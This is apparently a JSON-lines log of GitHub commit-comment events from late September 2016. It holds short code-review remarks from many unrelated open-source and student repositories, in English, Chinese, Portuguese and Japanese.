{"id":"4641124903","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19235521,"position":128,"line":273,"path":"src/com/dotmarketing/portlets/cmsmaintenance/ajax/IndexAjaxAction.java","commit_id":"106caa240571eb63b9dd3eb43662ff9392f144e7","created_at":"2016-09-30T02:33:30Z","updated_at":"2016-09-30T02:33:30Z","body":"Same as above"}},"created_at":"2016-09-30T02:33:30Z"}
{"id":"4641125252","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19235522,"position":131,"line":276,"path":"src/com/dotmarketing/portlets/cmsmaintenance/ajax/IndexAjaxAction.java","commit_id":"106caa240571eb63b9dd3eb43662ff9392f144e7","created_at":"2016-09-30T02:33:39Z","updated_at":"2016-09-30T02:33:39Z","body":"Same as above"}},"created_at":"2016-09-30T02:33:39Z"}
{"id":"4641125402","type":"CommitCommentEvent","actor":{"login":"wg1989john"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":19235523,"position":null,"line":null,"path":null,"commit_id":"88d9c30cf57ec7328f16a241f10c84415e9aef4e","created_at":"2016-09-30T02:33:42Z","updated_at":"2016-09-30T02:33:42Z","body":"Maybe miss the rbsp_stop_bits and rbsp_trailing_zero"}},"created_at":"2016-09-30T02:33:42Z"}
{"id":"4641126087","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19235525,"position":4,"line":96,"path":"lilac","commit_id":"248157447cfec0a4c0d4807f33063a8447c6d972","created_at":"2016-09-30T02:33:59Z","updated_at":"2016-09-30T02:33:59Z","body":"为什么去掉以后就能发呢？"}},"created_at":"2016-09-30T02:33:59Z"}
{"id":"4641127933","type":"CommitCommentEvent","actor":{"login":"tank0412"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19235532,"position":null,"line":null,"path":null,"commit_id":"7a3c50f66d386009671c36fde20e57a951ea30d4","created_at":"2016-09-30T02:34:42Z","updated_at":"2016-09-30T02:34:42Z","body":"I do not know which logcat did you use and do you  have a skill of logcat reading but OEM logo is passed.\r\nIf you think that i am lying, you always can downloading latest build from Basketbuild and check it by yourself."}},"created_at":"2016-09-30T02:34:42Z"}
{"id":"4641128811","type":"CommitCommentEvent","actor":{"login":"macedir"},"repo":{"name":"macedir/School"},"payload":{"comment":{"id":19235534,"position":null,"line":null,"path":null,"commit_id":"ffd9c6f096e83571e188f44b6d2c7096a404ed3e","created_at":"2016-09-30T02:35:01Z","updated_at":"2016-09-30T02:35:01Z","body":"whoops should add a new line then"}},"created_at":"2016-09-30T02:35:01Z"}
{"id":"4641129466","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19235537,"position":null,"line":null,"path":null,"commit_id":"288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2","created_at":"2016-09-30T02:35:18Z","updated_at":"2016-09-30T02:35:18Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2113 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-84.62%25-red.svg)</a> \n"}},"created_at":"2016-09-30T02:35:18Z"}
{"id":"4641132824","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19235544,"position":15,"line":15,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"f50e7af2ed5bb669dc6ba9093da359923e7e638a","created_at":"2016-09-30T02:36:35Z","updated_at":"2016-09-30T02:36:35Z","body":"Português OU inglês. Os dois não dá ❌ ❌ ❌ "}},"created_at":"2016-09-30T02:36:35Z"}
{"id":"4641139571","type":"CommitCommentEvent","actor":{"login":"mloebens"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19235562,"position":15,"line":15,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"f50e7af2ed5bb669dc6ba9093da359923e7e638a","created_at":"2016-09-30T02:38:58Z","updated_at":"2016-09-30T02:38:58Z","body":"Opa!nem tinha me ligado, ajusto na próxima revision."}},"created_at":"2016-09-30T02:38:58Z"}
{"id":"4641140760","type":"CommitCommentEvent","actor":{"login":"flavour"},"repo":{"name":"sahana/SAMBRO"},"payload":{"comment":{"id":19235565,"position":13,"line":405,"path":"modules/s3/s3msg.py","commit_id":"ef7383f2446e3a1d57554df1cd58115c97968352","created_at":"2016-09-30T02:39:27Z","updated_at":"2016-09-30T02:39:27Z","body":"I am wary of forcing all email attachments to be documents at the outer level of the API.\r\nWe should be able to hide this within the internal aspects.\r\ni.e. Our API for seidning attachments should support 2 routes:\r\n(A) We provide a document_id (so we don't need to provide the file_path, this can be calculated internally)\r\n- msg_attachment is pointed to this\r\nor\r\n(B) We provide a file_path (so we need to create a new doc_document to point msg_attachment to) "}},"created_at":"2016-09-30T02:39:27Z"}
{"id":"4641141632","type":"CommitCommentEvent","actor":{"login":"Senorsen"},"repo":{"name":"GyrosWorkshop/WukongWeb"},"payload":{"comment":{"id":19235569,"position":42,"line":77,"path":"src/component/status/index.jsx","commit_id":"d9105cbf65d6787108def2844fb7da244375ea8e","created_at":"2016-09-30T02:39:50Z","updated_at":"2016-09-30T02:39:50Z","body":"这儿把 a 改成 span 不好的一点在于，没法右击复制链接地址了… 右击也会被作为 click"}},"created_at":"2016-09-30T02:39:50Z"}
{"id":"4641142208","type":"CommitCommentEvent","actor":{"login":"peterlarson"},"repo":{"name":"peterlarson/cageOS"},"payload":{"comment":{"id":19235570,"position":null,"line":null,"path":null,"commit_id":"3f23d7339e4dce911fd91e1978783c6e261d543a","created_at":"2016-09-30T02:40:03Z","updated_at":"2016-09-30T02:40:03Z","body":"順調な"}},"created_at":"2016-09-30T02:40:03Z"}
{"id":"4641143865","type":"CommitCommentEvent","actor":{"login":"peterlarson"},"repo":{"name":"peterlarson/cageOS"},"payload":{"comment":{"id":19235577,"position":null,"line":null,"path":null,"commit_id":"21590e5589eba715b43e618ff0a134bebbe38627","created_at":"2016-09-30T02:40:41Z","updated_at":"2016-09-30T02:40:41Z","body":"![thumbs-up](https://cloud.githubusercontent.com/assets/9342958/18979048/bdb3df14-8695-11e6-8c75-a478d8052796.png)\r\n"}},"created_at":"2016-09-30T02:40:41Z"}
{"id":"4641144347","type":"CommitCommentEvent","actor":{"login":"zhw2101024"},"repo":{"name":"zhw2101024/libsg"},"payload":{"comment":{"id":19235578,"position":null,"line":null,"path":null,"commit_id":"d2ac3a6bb31b5ff4d1f93e41f3345c1988881355","created_at":"2016-09-30T02:40:52Z","updated_at":"2016-09-30T02:40:52Z","body":"增加mac的ffmpeg编译脚本，包含静态库和动态库。官方指南要求安装glib，实际上可以通过一个编译参数绕过的，不影响ffpeg库。"}},"created_at":"2016-09-30T02:40:52Z"}
{"id":"4641146698","type":"CommitCommentEvent","actor":{"login":"flavour"},"repo":{"name":"sahana/SAMBRO"},"payload":{"comment":{"id":19235579,"position":4,"line":554,"path":"modules/s3db/msg.py","commit_id":"ef7383f2446e3a1d57554df1cd58115c97968352","created_at":"2016-09-30T02:41:47Z","updated_at":"2016-09-30T02:41:47Z","body":"If we link to document_id, I don't think we need an additional file_path here?"}},"created_at":"2016-09-30T02:41:47Z"}
{"id":"4641153720","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19235593,"position":6,"line":15,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"f0b295c9d63207ad67ad613e4d25cb4d638eb767","created_at":"2016-09-30T02:44:28Z","updated_at":"2016-09-30T02:44:28Z","body":"Sabemos que o método da classe arraylist retorna true, mas o cliente não solicitou que o nosso retornasse."}},"created_at":"2016-09-30T02:44:28Z"}
{"id":"4641155716","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19235600,"position":111,"line":261,"path":"src/com/dotmarketing/portlets/cmsmaintenance/ajax/IndexAjaxAction.java","commit_id":"106caa240571eb63b9dd3eb43662ff9392f144e7","created_at":"2016-09-30T02:45:11Z","updated_at":"2016-09-30T02:45:11Z","body":"Should this check be performed at the beginning of the for's body, so we don't do IO operations and then fail? "}},"created_at":"2016-09-30T02:45:11Z"}
{"id":"4641158226","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":19235607,"position":null,"line":null,"path":null,"commit_id":"84b7ebdf425a25731425541fbd8ca643a6396e6e","created_at":"2016-09-30T02:46:10Z","updated_at":"2016-09-30T02:46:10Z","body":"Fixed in https://github.com/rakudo/rakudo/commit/415461b4d3419b77d1f290ac8416c39ad95d5838, thank you."}},"created_at":"2016-09-30T02:46:10Z"}
{"id":"4641158676","type":"CommitCommentEvent","actor":{"login":"noxidsoft"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":19235608,"position":null,"line":null,"path":null,"commit_id":"63129112bbea91f7cd62014f162f857f50084656","created_at":"2016-09-30T02:46:16Z","updated_at":"2016-09-30T02:46:16Z","body":"Must have been a late night coding in the dim dark dungeon."}},"created_at":"2016-09-30T02:46:16Z"}
{"id":"4641159104","type":"CommitCommentEvent","actor":{"login":"macedir"},"repo":{"name":"macedir/School"},"payload":{"comment":{"id":19235610,"position":null,"line":null,"path":null,"commit_id":"e2a3ffec99d11debd87aef4b7a32f7b1d3170b88","created_at":"2016-09-30T02:46:30Z","updated_at":"2016-09-30T02:46:30Z","body":"oops wrong commit message"}},"created_at":"2016-09-30T02:46:30Z"}
{"id":"4641160325","type":"CommitCommentEvent","actor":{"login":"jcoyne"},"repo":{"name":"projecthydra/curation_concerns"},"payload":{"comment":{"id":19235614,"position":51,"line":31,"path":"app/search_builders/curation_concerns/collection_search_builder.rb","commit_id":"89cfc801d0e40d7587f0322e32584367174a16c3","created_at":"2016-09-30T02:47:00Z","updated_at":"2016-09-30T02:47:00Z","body":"👍 "}},"created_at":"2016-09-30T02:47:00Z"}
{"id":"4641162421","type":"CommitCommentEvent","actor":{"login":"shawnbrown"},"repo":{"name":"if-then-fund/newco"},"payload":{"comment":{"id":19235617,"position":null,"line":null,"path":null,"commit_id":"9a6cc511865fe1884db8c02a68a1ed75d6a9884c","created_at":"2016-09-30T02:47:50Z","updated_at":"2016-09-30T02:47:50Z","body":"Hookerton, North Carolina ([link](https://en.wikipedia.org/wiki/Hookerton,_North_Carolina))"}},"created_at":"2016-09-30T02:47:50Z"}
{"id":"4641163302","type":"CommitCommentEvent","actor":{"login":"Rudd-O"},"repo":{"name":"biotinker/LibreTasks"},"payload":{"comment":{"id":19235618,"position":1,"line":1,"path":"wiki/CodeReviewHelp.md","commit_id":"51167c0a4ddd4ac8668ae37cd1b401470cf7974c","created_at":"2016-09-30T02:48:09Z","updated_at":"2016-09-30T02:48:09Z","body":"This is a 100% garbage file that makes no sense to anyone, demands people execute untrusted code, and is obsolete because the project is using Github.\r\n\r\nPlease delete this, and the other files saying essentially \"pending\".\r\n\r\n:-)"}},"created_at":"2016-09-30T02:48:09Z"}
{"id":"4641165241","type":"CommitCommentEvent","actor":{"login":"Rudd-O"},"repo":{"name":"biotinker/LibreTasks"},"payload":{"comment":{"id":19235624,"position":1,"line":1,"path":"wiki/AddingDatatypes.md","commit_id":"51167c0a4ddd4ac8668ae37cd1b401470cf7974c","created_at":"2016-09-30T02:48:56Z","updated_at":"2016-09-30T02:48:56Z","body":"Garbage."}},"created_at":"2016-09-30T02:48:56Z"}
{"id":"4641165820","type":"CommitCommentEvent","actor":{"login":"Rudd-O"},"repo":{"name":"biotinker/LibreTasks"},"payload":{"comment":{"id":19235627,"position":1,"line":1,"path":"wiki/AddingViewItems.md","commit_id":"51167c0a4ddd4ac8668ae37cd1b401470cf7974c","created_at":"2016-09-30T02:49:08Z","updated_at":"2016-09-30T02:49:08Z","body":"Garbage at this point in time."}},"created_at":"2016-09-30T02:49:08Z"}
{"id":"4641166056","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19235629,"position":15,"line":48,"path":"src/modulo-01-java-OO/modulo-01/InventarioTest.java","commit_id":"aac0a5014f77ed2f9ea1a8e6dc2145482ab4a817","created_at":"2016-09-30T02:49:14Z","updated_at":"2016-09-30T02:49:14Z","body":"😂 "}},"created_at":"2016-09-30T02:49:14Z"}
{"id":"4641167556","type":"CommitCommentEvent","actor":{"login":"Rudd-O"},"repo":{"name":"biotinker/LibreTasks"},"payload":{"comment":{"id":19235632,"position":8,"line":8,"path":"wiki/EventFlowDiagram.md","commit_id":"51167c0a4ddd4ac8668ae37cd1b401470cf7974c","created_at":"2016-09-30T02:49:50Z","updated_at":"2016-09-30T02:49:50Z","body":"This file doesn't even exist anymore, or won't exist very soon."}},"created_at":"2016-09-30T02:49:50Z"}
{"id":"4641168446","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19235635,"position":101,"line":405,"path":"src/com/dotmarketing/util/DateUtil.java","commit_id":"106caa240571eb63b9dd3eb43662ff9392f144e7","created_at":"2016-09-30T02:50:13Z","updated_at":"2016-09-30T02:50:13Z","body":"[DateTimeFormatter](https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html) is thread-safe so no need the synchronized block."}},"created_at":"2016-09-30T02:50:13Z"}
{"id":"4641168832","type":"CommitCommentEvent","actor":{"login":"b1ueki"},"repo":{"name":"b1ueki/kadai5"},"payload":{"comment":{"id":19235636,"position":null,"line":null,"path":null,"commit_id":"464636e38980e26243d9cd7904bb1dff0371e57b","created_at":"2016-09-30T02:50:21Z","updated_at":"2016-09-30T02:50:21Z","body":"あいうえお"}},"created_at":"2016-09-30T02:50:21Z"}
{"id":"4641171965","type":"CommitCommentEvent","actor":{"login":"billychou"},"repo":{"name":"billychou/practice_demo"},"payload":{"comment":{"id":19235644,"position":null,"line":null,"path":null,"commit_id":"c98dc8eab5cb08c292425f2843828e5ffcb41a38","created_at":"2016-09-30T02:51:29Z","updated_at":"2016-09-30T02:51:29Z","body":"充分利用列表表达式"}},"created_at":"2016-09-30T02:51:29Z"}
{"id":"4641173543","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19235648,"position":84,"line":243,"path":"src/com/dotmarketing/portlets/cmsmaintenance/ajax/IndexAjaxAction.java","commit_id":"106caa240571eb63b9dd3eb43662ff9392f144e7","created_at":"2016-09-30T02:52:09Z","updated_at":"2016-09-30T02:52:09Z","body":"We are already catching some of these exceptions so no need to put them here"}},"created_at":"2016-09-30T02:52:09Z"}
{"id":"4641174621","type":"CommitCommentEvent","actor":{"login":"jcoyne"},"repo":{"name":"projecthydra/curation_concerns"},"payload":{"comment":{"id":19235651,"position":4,"line":4,"path":"app/search_builders/curation_concerns/README.md","commit_id":"e94ee705c3b132277dbba60d9cca4aa5c9d73050","created_at":"2016-09-30T02:52:34Z","updated_at":"2016-09-30T02:52:34Z","body":"Having written the original SearchBuilder, I can attest that they were not so named because of the builder pattern.  They were named that way because they build searches. This class was derived from the RequestBuilder module (https://github.com/projectblacklight/blacklight/blob/v5.2.0/lib/blacklight/request_builders.rb) which in no way followed the builder pattern."}},"created_at":"2016-09-30T02:52:34Z"}
{"id":"4641174730","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19235652,"position":56,"line":49,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"32195dd57a95e59ea18af4d4b1252de10f21072e","created_at":"2016-09-30T02:52:37Z","updated_at":"2016-09-30T02:52:37Z","body":"Note que o trecho ```this.inventario.getItens().get(1)``` está duplicado na classe, como podemos melhorar?"}},"created_at":"2016-09-30T02:52:37Z"}
{"id":"4641176603","type":"CommitCommentEvent","actor":{"login":"jcoyne"},"repo":{"name":"projecthydra/curation_concerns"},"payload":{"comment":{"id":19235654,"position":4,"line":4,"path":"app/search_builders/curation_concerns/README.md","commit_id":"e94ee705c3b132277dbba60d9cca4aa5c9d73050","created_at":"2016-09-30T02:53:17Z","updated_at":"2016-09-30T02:53:17Z","body":"But It is also my firm belief that all documentation is lies and half truths, so carry on 👍 😉 "}},"created_at":"2016-09-30T02:53:17Z"}
{"id":"4641179407","type":"CommitCommentEvent","actor":{"login":"jcoyne"},"repo":{"name":"projecthydra/curation_concerns"},"payload":{"comment":{"id":19235658,"position":19,"line":19,"path":"app/search_builders/curation_concerns/README.md","commit_id":"e94ee705c3b132277dbba60d9cca4aa5c9d73050","created_at":"2016-09-30T02:54:27Z","updated_at":"2016-09-30T02:54:27Z","body":"replace \"repo\" with \"gem\". Here's a SearchBuilder in a repo: https://github.com/projecthydra-labs/lerna/blob/master/app/models/search_builder.rb"}},"created_at":"2016-09-30T02:54:27Z"}
{"id":"4641179817","type":"CommitCommentEvent","actor":{"login":"Qusic"},"repo":{"name":"GyrosWorkshop/WukongWeb"},"payload":{"comment":{"id":19235660,"position":42,"line":77,"path":"src/component/status/index.jsx","commit_id":"d9105cbf65d6787108def2844fb7da244375ea8e","created_at":"2016-09-30T02:54:38Z","updated_at":"2016-09-30T02:54:38Z","body":"ydl。。我是想着颜色这些指定两遍不太yy"}},"created_at":"2016-09-30T02:54:38Z"}
{"id":"4641180789","type":"CommitCommentEvent","actor":{"login":"Lee-SDU"},"repo":{"name":"XX-net/XX-Net"},"payload":{"comment":{"id":19235662,"position":null,"line":null,"path":null,"commit_id":"ae7fd8d252f941e6db575593381d3cd3c5288806","created_at":"2016-09-30T02:55:04Z","updated_at":"2016-09-30T02:55:04Z","body":"long time no update. "}},"created_at":"2016-09-30T02:55:04Z"}
{"id":"4641182782","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19235666,"position":7,"line":2063,"path":"commands.js","commit_id":"810d1e5f23b206719f4e6b2288dacf698b194438","created_at":"2016-09-30T02:55:46Z","updated_at":"2016-09-30T02:55:46Z","body":"you know this doesn't return an array, right?"}},"created_at":"2016-09-30T02:55:46Z"}
{"id":"4641183560","type":"CommitCommentEvent","actor":{"login":"jcoyne"},"repo":{"name":"projecthydra/curation_concerns"},"payload":{"comment":{"id":19235669,"position":20,"line":20,"path":"app/search_builders/curation_concerns/README.md","commit_id":"e94ee705c3b132277dbba60d9cca4aa5c9d73050","created_at":"2016-09-30T02:56:04Z","updated_at":"2016-09-30T02:56:04Z","body":"Are you aware of any instances of SearchBuilders (besides `::SearchBuilder`) decending from `Blacklight::SearchBuilder`?  If they do exist, I think it might be a bug."}},"created_at":"2016-09-30T02:56:04Z"}
{"id":"4641185948","type":"CommitCommentEvent","actor":{"login":"xiaoshuang112"},"repo":{"name":"xiaoshuang112/BP"},"payload":{"comment":{"id":19235672,"position":null,"line":null,"path":null,"commit_id":"5cec11e81d887396089daaffe36032711f8bb7b5","created_at":"2016-09-30T02:57:01Z","updated_at":"2016-09-30T02:57:01Z","body":"+#pragma intrinsic(exp) 这是SSE优化"}},"created_at":"2016-09-30T02:57:01Z"}
{"id":"4641186372","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19235673,"position":null,"line":null,"path":null,"commit_id":"4f3fde42d054b1ddc1acf9b5260c6ec19ce71fcb","created_at":"2016-09-30T02:57:10Z","updated_at":"2016-09-30T02:57:10Z","body":"1- Just compare the re-worked menu with ATV and try to find the differences.\r\nAnd hence the same criticism applies: an inconvenient (cluttered) arrangement, which makes it hard to find items.\r\n\r\n2- See screenshots for streaming-related stuff that s now under 'Tuner config':\r\n![mr 02](https://cloud.githubusercontent.com/assets/1040294/18979295/dbf01e28-86c9-11e6-80ea-e70ef56a17f6.jpg)\r\n![mr 01](https://cloud.githubusercontent.com/assets/1040294/18979296/dbf27358-86c9-11e6-8f36-63ccdef78c98.jpg)\r\n\r\n3- Only 'Network' has now a really better categorization.\r\n"}},"created_at":"2016-09-30T02:57:10Z"}
{"id":"4641192708","type":"CommitCommentEvent","actor":{"login":"jcoyne"},"repo":{"name":"projecthydra/curation_concerns"},"payload":{"comment":{"id":19235688,"position":7,"line":3,"path":"app/search_builders/curation_concerns/collection_search_builder.rb","commit_id":"e94ee705c3b132277dbba60d9cca4aa5c9d73050","created_at":"2016-09-30T02:59:45Z","updated_at":"2016-09-30T02:59:45Z","body":"👍 "}},"created_at":"2016-09-30T02:59:45Z"}
{"id":"4641193178","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19235692,"position":null,"line":null,"path":null,"commit_id":"41984ebeef9f22d92bb1f3cdfd8502435691394a","created_at":"2016-09-30T02:59:56Z","updated_at":"2016-09-30T02:59:56Z","body":"Related to: backdrop/backdrop-issues#2246 "}},"created_at":"2016-09-30T02:59:56Z"}
{"id":"4645541408","type":"CommitCommentEvent","actor":{"login":"nkhalaieff"},"repo":{"name":"nkhalaieff/fin4ds"},"payload":{"comment":{"id":19247084,"position":null,"line":null,"path":null,"commit_id":"cfc2f060cfa621e4f8dfdc756787618a5a8d1f51","created_at":"2016-09-30T20:00:45Z","updated_at":"2016-09-30T20:00:45Z","body":"Uncommented The table creation"}},"created_at":"2016-09-30T20:00:45Z"}
{"id":"4645543650","type":"CommitCommentEvent","actor":{"login":"lewismc"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19247090,"position":15,"line":44,"path":"core/src/main/java/esiptestbed/mudrod/ssearch/ranking/Learner.java","commit_id":"178312a22d2a5cfbc191e3817085df6af963430e","created_at":"2016-09-30T20:01:12Z","updated_at":"2016-09-30T20:01:12Z","body":"Hi @Yongyao I've now fixed this... please see the configuration property at https://github.com/mudrod/mudrod/blob/master/core/src/main/resources/config.xml#L66"}},"created_at":"2016-09-30T20:01:12Z"}
{"id":"4645546782","type":"CommitCommentEvent","actor":{"login":"dwmw2"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19247095,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T20:01:51Z","updated_at":"2016-09-30T20:01:51Z","body":"Hm, I observe that 0.23.2 is being shipped, by the upstream p11-kit maintainer, in Fedora.\r\nI don't think it's really considered an \"unstable\" release. @stefwalter?\r\n\r\nNote that the latest \"stable\" 0.22.1 predates even the final release of RFC7512, and there were changes between the later drafts and the final RFC which are only supported in 0.23.1 onwards. You really don't want to live without the `pin-value` attribute, for example. \r\n\r\nAnd... now I'm confused because the git repository shows no signs of 0.23.2 ever having been released....wtf?"}},"created_at":"2016-09-30T20:01:51Z"}
{"id":"4645550842","type":"CommitCommentEvent","actor":{"login":"lewismc"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19247109,"position":24,"line":17,"path":"service/src/main/webapp/WEB-INF/web.xml","commit_id":"178312a22d2a5cfbc191e3817085df6af963430e","created_at":"2016-09-30T20:02:41Z","updated_at":"2016-09-30T20:02:41Z","body":"@Yongyao please open a new issue for this and submit a fix. I rolled this back unintentionally as part of moving everything towards the JAXRS standards.\r\nPlease update it all, add the attributions you require and please commit to master branch.\r\nI am also working on REST APi documentation (which we now have) so I will post a patch and fix for that as well."}},"created_at":"2016-09-30T20:02:41Z"}
{"id":"4645552604","type":"CommitCommentEvent","actor":{"login":"garpinc"},"repo":{"name":"pac4j/spring-security-pac4j"},"payload":{"comment":{"id":19247115,"position":null,"line":null,"path":null,"commit_id":"bd3b41251fc98207e20ffe7e4d9e0bc34b5cb4b8","created_at":"2016-09-30T20:03:04Z","updated_at":"2016-09-30T20:03:04Z","body":"I ran into a problem since spring security context is supposed to be serializable. Since now WebContext is part of authentication token, that's not serializable, so that causes a problem for me. Any suggestions?"}},"created_at":"2016-09-30T20:03:04Z"}
{"id":"4645557473","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19247136,"position":null,"line":null,"path":null,"commit_id":"98110d78cf2a214f8cba646a390328da0f4bb512","created_at":"2016-09-30T20:04:09Z","updated_at":"2016-09-30T20:04:09Z","body":"Every time multisample quality is converted to nr_samples it's checked against the format. It fails to create surfaces/devices with invalid multisample quality. As you stated format x might give 2 quality levels and format y 4."}},"created_at":"2016-09-30T20:04:09Z"}
{"id":"4645557642","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19247138,"position":379,"line":379,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T20:04:11Z","updated_at":"2016-09-30T20:04:11Z","body":"Use kcalloc here also or use the same call"}},"created_at":"2016-09-30T20:04:11Z"}
{"id":"4645562609","type":"CommitCommentEvent","actor":{"login":"endless-sky"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19247156,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T20:05:13Z","updated_at":"2016-09-30T20:05:13Z","body":"There was a bug a while back where you could click on invisible ships to target them, but that's been fixed in 0.9.3."}},"created_at":"2016-09-30T20:05:13Z"}
{"id":"4645564505","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19247164,"position":423,"line":423,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T20:05:36Z","updated_at":"2016-09-30T20:05:36Z","body":"dd is not the most explicit name for the meson irq domain "}},"created_at":"2016-09-30T20:05:36Z"}
{"id":"4645565030","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19247166,"position":null,"line":null,"path":null,"commit_id":"98110d78cf2a214f8cba646a390328da0f4bb512","created_at":"2016-09-30T20:05:44Z","updated_at":"2016-09-30T20:05:44Z","body":"Should I rework d3dmultisample_type_check to make it clear what happens?"}},"created_at":"2016-09-30T20:05:44Z"}
{"id":"4645569008","type":"CommitCommentEvent","actor":{"login":"noniq"},"repo":{"name":"rspec/rspec.tmbundle"},"payload":{"comment":{"id":19247182,"position":5,"line":95,"path":"Syntaxes/RSpec.tmLanguage","commit_id":"dc77c35115ba34d6765386b37849957d1f2e2c37","created_at":"2016-09-30T20:06:33Z","updated_at":"2016-09-30T20:06:33Z","body":"Please fix this occurance as well."}},"created_at":"2016-09-30T20:06:33Z"}
{"id":"4645569951","type":"CommitCommentEvent","actor":{"login":"noniq"},"repo":{"name":"rspec/rspec.tmbundle"},"payload":{"comment":{"id":19247186,"position":23,"line":212,"path":"Syntaxes/RSpec.tmLanguage","commit_id":"dc77c35115ba34d6765386b37849957d1f2e2c37","created_at":"2016-09-30T20:06:45Z","updated_at":"2016-09-30T20:06:45Z","body":"And this one, too :)"}},"created_at":"2016-09-30T20:06:45Z"}
{"id":"4645573130","type":"CommitCommentEvent","actor":{"login":"VegLeMeccano"},"repo":{"name":"VegLeMeccano/EUROBOT-2017"},"payload":{"comment":{"id":19247194,"position":null,"line":null,"path":null,"commit_id":"3b7a8c9ddd963fae1911b38572d12ee04566225c","created_at":"2016-09-30T20:07:22Z","updated_at":"2016-09-30T20:07:22Z","body":"here will be placed the code for the Eurobot competition 2017 Moon Village"}},"created_at":"2016-09-30T20:07:22Z"}
{"id":"4645573733","type":"CommitCommentEvent","actor":{"login":"madhurkhandelwal234"},"repo":{"name":"nagkumar91/cmpe273-fall2016"},"payload":{"comment":{"id":19247196,"position":null,"line":null,"path":null,"commit_id":"16a04caa91dacda2c62493cf95e324320b86f5a3","created_at":"2016-09-30T20:07:30Z","updated_at":"2016-09-30T20:07:30Z","body":"Do we need to restrict the category entered by the user to one of the three? Or accept whatever he enters?"}},"created_at":"2016-09-30T20:07:30Z"}
{"id":"4645574594","type":"CommitCommentEvent","actor":{"login":"Bernsteinbear1825"},"repo":{"name":"antmelon/ftc_app-master"},"payload":{"comment":{"id":19247202,"position":null,"line":null,"path":null,"commit_id":"07d612593443f5af979690baf17dc3ece798d43c","created_at":"2016-09-30T20:07:41Z","updated_at":"2016-09-30T20:07:41Z","body":"Ur a cuck\r\n"}},"created_at":"2016-09-30T20:07:41Z"}
